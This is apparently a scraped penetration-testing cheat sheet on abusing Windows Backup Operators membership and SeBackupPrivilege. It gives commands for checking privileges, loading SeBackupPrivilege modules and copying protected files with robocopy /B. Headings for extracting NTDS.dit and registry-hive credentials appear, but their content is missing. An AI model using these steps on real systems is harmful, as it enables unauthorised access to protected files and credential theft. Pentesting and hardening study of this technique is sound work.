8.Windows-built-in-groups
Approach to Exploiting Windows Built-in Groups (Focus: Backup Operators)
Identify Group Memberships:
whoami /groups # Check if the user is in "Backup Operators"Verify SeBackupPrivilege:
whoami /priv # Check if SeBackupPrivilege is present
Get-SeBackupPrivilege # PowerShell cmdletEnable SeBackupPrivilege (if needed):
Set-SeBackupPrivilege # PowerShell cmdletImport SeBackupPrivilege Modules:
Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dllAccess Protected Files:
dir <protected_directory> # Verify lack of access
Copy-FileSeBackupPrivilege <protected_file> <destination>
robocopy /B <source> <destination> <file>Target Domain Controller (NTDS.dit):
Backup Registry Hives:
Extract Credentials (NTDS.dit):
Commands:
PowerShell Cmdlets:
Tools:
Techniques:
Last updated